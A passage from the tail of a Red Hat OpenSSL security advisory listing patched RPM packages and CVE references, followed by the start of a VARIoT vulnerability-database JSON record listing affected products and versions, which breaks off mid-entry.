Red Hat Enterprise Linux Workstation Optional (v. 6):
i386: openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm openssl-perl-1.0.1e-30.el6_6.5.i686.rpm openssl-static-1.0.1e-30.el6_6.5.i686.rpm
x86_64: openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm openssl-perl-1.0.1e-30.el6_6.5.x86_64.rpm openssl-static-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux Client (v. 7):
Source: openssl-1.0.1e-34.el7_0.7.src.rpm
x86_64: openssl-1.0.1e-34.el7_0.7.x86_64.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm openssl-libs-1.0.1e-34.el7_0.7.i686.rpm openssl-libs-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64: openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm openssl-devel-1.0.1e-34.el7_0.7.i686.rpm openssl-devel-1.0.1e-34.el7_0.7.x86_64.rpm openssl-perl-1.0.1e-34.el7_0.7.x86_64.rpm openssl-static-1.0.1e-34.el7_0.7.i686.rpm openssl-static-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source: openssl-1.0.1e-34.el7_0.7.src.rpm
x86_64: openssl-1.0.1e-34.el7_0.7.x86_64.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm openssl-libs-1.0.1e-34.el7_0.7.i686.rpm openssl-libs-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64: openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm openssl-devel-1.0.1e-34.el7_0.7.i686.rpm openssl-devel-1.0.1e-34.el7_0.7.x86_64.rpm openssl-perl-1.0.1e-34.el7_0.7.x86_64.rpm openssl-static-1.0.1e-34.el7_0.7.i686.rpm openssl-static-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: openssl-1.0.1e-34.el7_0.7.src.rpm
ppc64: openssl-1.0.1e-34.el7_0.7.ppc64.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.ppc.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.ppc64.rpm openssl-devel-1.0.1e-34.el7_0.7.ppc.rpm openssl-devel-1.0.1e-34.el7_0.7.ppc64.rpm openssl-libs-1.0.1e-34.el7_0.7.ppc.rpm openssl-libs-1.0.1e-34.el7_0.7.ppc64.rpm
s390x: openssl-1.0.1e-34.el7_0.7.s390x.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.s390.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.s390x.rpm openssl-devel-1.0.1e-34.el7_0.7.s390.rpm openssl-devel-1.0.1e-34.el7_0.7.s390x.rpm openssl-libs-1.0.1e-34.el7_0.7.s390.rpm openssl-libs-1.0.1e-34.el7_0.7.s390x.rpm
x86_64: openssl-1.0.1e-34.el7_0.7.x86_64.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm openssl-devel-1.0.1e-34.el7_0.7.i686.rpm openssl-devel-1.0.1e-34.el7_0.7.x86_64.rpm openssl-libs-1.0.1e-34.el7_0.7.i686.rpm openssl-libs-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
ppc64: openssl-debuginfo-1.0.1e-34.el7_0.7.ppc.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.ppc64.rpm openssl-perl-1.0.1e-34.el7_0.7.ppc64.rpm openssl-static-1.0.1e-34.el7_0.7.ppc.rpm openssl-static-1.0.1e-34.el7_0.7.ppc64.rpm
s390x: openssl-debuginfo-1.0.1e-34.el7_0.7.s390.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.s390x.rpm openssl-perl-1.0.1e-34.el7_0.7.s390x.rpm openssl-static-1.0.1e-34.el7_0.7.s390.rpm openssl-static-1.0.1e-34.el7_0.7.s390x.rpm
x86_64: openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm openssl-perl-1.0.1e-34.el7_0.7.x86_64.rpm openssl-static-1.0.1e-34.el7_0.7.i686.rpm openssl-static-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: openssl-1.0.1e-34.el7_0.7.src.rpm
x86_64: openssl-1.0.1e-34.el7_0.7.x86_64.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm openssl-devel-1.0.1e-34.el7_0.7.i686.rpm openssl-devel-1.0.1e-34.el7_0.7.x86_64.rpm openssl-libs-1.0.1e-34.el7_0.7.i686.rpm openssl-libs-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64: openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm openssl-perl-1.0.1e-34.el7_0.7.x86_64.rpm openssl-static-1.0.1e-34.el7_0.7.i686.rpm openssl-static-1.0.1e-34.el7_0.7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2014-3570 https://access.redhat.com/security/cve/CVE-2014-3571 https://access.redhat.com/security/cve/CVE-2014-3572 https://access.redhat.com/security/cve/CVE-2014-8275 https://access.redhat.com/security/cve/CVE-2015-0204 https://access.redhat.com/security/cve/CVE-2015-0205 https://access.redhat.com/security/cve/CVE-2015-0206 https://access.redhat.com/security/updates/classification/#moderate https://www.openssl.org/news/secadv_20150108.txt
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2015 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD8DBQFUwCWMXlSAg2UNWIIRAioBAJ4/RjG4OGXzCwg+PJJWNqyvahe3rQCeNE+X ENFobdxQdJ+gVAiRe8Qf54A= =wyAg -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201501-0340", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1f" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1i" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.0n" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1h" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1d" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1j" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1b" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1g" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1c" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0m" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0o" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0h" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0j" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0g" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0f" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0i" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0l" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0k" }, { "model": "paging server", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.6, "vendor": "hp", "version": "7.4" }, { "model": "cognos controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "mate collector", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ata series analog terminal adaptor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1900" }, { "model": "aura collaboration environment", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "3.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3.1" }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "30000" }, { "model": "bladecenter advanced management module 25r5778", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "es750", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.10.186" }, { "model": "telepresence server on virtual machine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "4.1" }, { "model": "bladecenter -s", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1948" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.6" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.0" }, { "model": "proactive network operations center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x22025850" }, { "model": "as infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "6" }, { "model": "thinpro linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.4" }, { "model": "mysql server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6" }, { "model": "project openssl 1.0.0d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "90000" }, { "model": "project openssl 1.0.1e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "idataplex dx360 m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79120" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "insight orchestration", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.8.780" }, { "model": "tandberg codian isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32400" }, { "model": "project openssl 1.0.1a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.2.2" }, { "model": "telepresence mcu", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "85100" }, { "model": "thinpro linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "(x86)4.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.2" }, { "model": "ip interoperability and collaboration system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 1.0.0p", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "edge digital media player", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3400" }, { "model": "systems insight manager 7.3.0a", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.0" }, { "model": "project openssl 1.0.0g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "telepresence server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70104.1" }, { "model": "prime security manager 04.8 qa08", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "ns oncommand core package", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.7" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.0-68" }, { "model": "prime license manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1.0.842" }, { "model": "flex system manager node types", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79550" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.0" }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "app for netapp data ontap", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "0" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3.0.870" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.2-77" }, { "model": "telepresence te software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "linux enterprise software development kit sp3", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "real-time compression appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.9.1.11" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x350073830" }, { "model": "as infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "7" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1" }, { "model": "prime network registrar", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8.2.2.2" }, { "model": "network configuration and change management service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "systems insight manager sp2", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.2" }, { "model": "prime collaboration assurance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0.0.840" }, { "model": "data ontap smi-s agent", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "systems insight manager sp1", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.0" }, { "model": "telepresence content server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tandberg codian mse model", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "83200" }, { "model": "local collector appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.2.8" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.2.77" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x310025820" }, { "model": "as infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "1" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1" }, { "model": "data ontap operating in 7-mode", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.3" }, { "model": "flex system fc3171 8gb san switch and san pass-thru", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.2.00" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.1.0" }, { "model": "project openssl 1.0.0m", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2.27" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1" }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x24087380" }, { "model": "project openssl 1.0.1g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.0" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "prime lan management solution", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "wide area application services", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0.96" }, { "model": "project openssl 1.0.1k", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.4" }, { "model": "bladecenter -t", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8720" }, { "model": "es1500", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.1.2" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "media services interface", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.6.156" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.0" }, { "model": "project openssl 1.0.1i", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.12" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.2" }, { "model": "unified attendant console advanced", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 1.0.0h", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "initiate master data service", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "8.1" }, { "model": "thinpro linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "(x86)4.3" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.10" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.6" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.6" }, { "model": "ns oncommand core package", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.1" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "14.10" }, { "model": "system management homepage c", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.10.186" }, { "model": "jabber for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4.1" }, { "model": "enterprise content delivery service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "adaptive security appliance software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8.4(7.26)" }, { "model": "real-time compression appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.8.0.10" }, { "model": "bladecenter -s", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8886" }, { "model": "unified sip proxy", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence advanced media gateway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "data ontap operating in 7-mode", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1.4" }, { "model": "unified attendant console premium edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tandberg codian isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32100" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "initiate master data service provider hub", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "firesight system software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.4.1.2" }, { "model": "app for stream", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "0" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.14" }, { "model": "virtual connect enterprise manager sdk", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4" }, { "model": "systems insight manager sp5", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.0" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.0.820" }, { "model": "adaptive security appliance software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9.1(5.106)" }, { "model": "systems insight manager sp1", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.1" }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x22079060" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.11" }, { "model": "physical access gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "as infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "5" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3850x638370" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0.1" }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x88042590" }, { "model": "project openssl 1.0.0l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "wireless lan controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "bladecenter -e", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7967" }, { "model": "dx360 m4 water cooled type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79180" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.3" }, { "model": "initiate master data service patient hub", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.3" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.68" }, { "model": "opensuse", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "13.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1.0.102" }, { "model": "anyres live", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.4" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "application policy infrastructure controller 1.0", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.1.830" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0" }, { "model": "bladecenter -h", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8852" }, { "model": "unified attendant console business edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nextscale nx360 m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "54550" }, { "model": "bladecenter -ht", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8750" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.15-210" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.13" }, { "model": "tandberg codian isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32200" }, { "model": "linux ia-64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2" }, { "model": "initiate master data service", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.2" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.9.1" }, { "model": "jabber video for telepresence", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "communications core session manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "7.3.5" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1.0-103" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.12.201" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0.0.95" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.4" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.11" }, { "model": "prime network registrar", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8.1.3.3" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.7.770" }, { "model": "prime collaboration deployment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "dx series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0.0-95" }, { "model": "virtualization experience media engine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "version control agent", "scope": "eq", 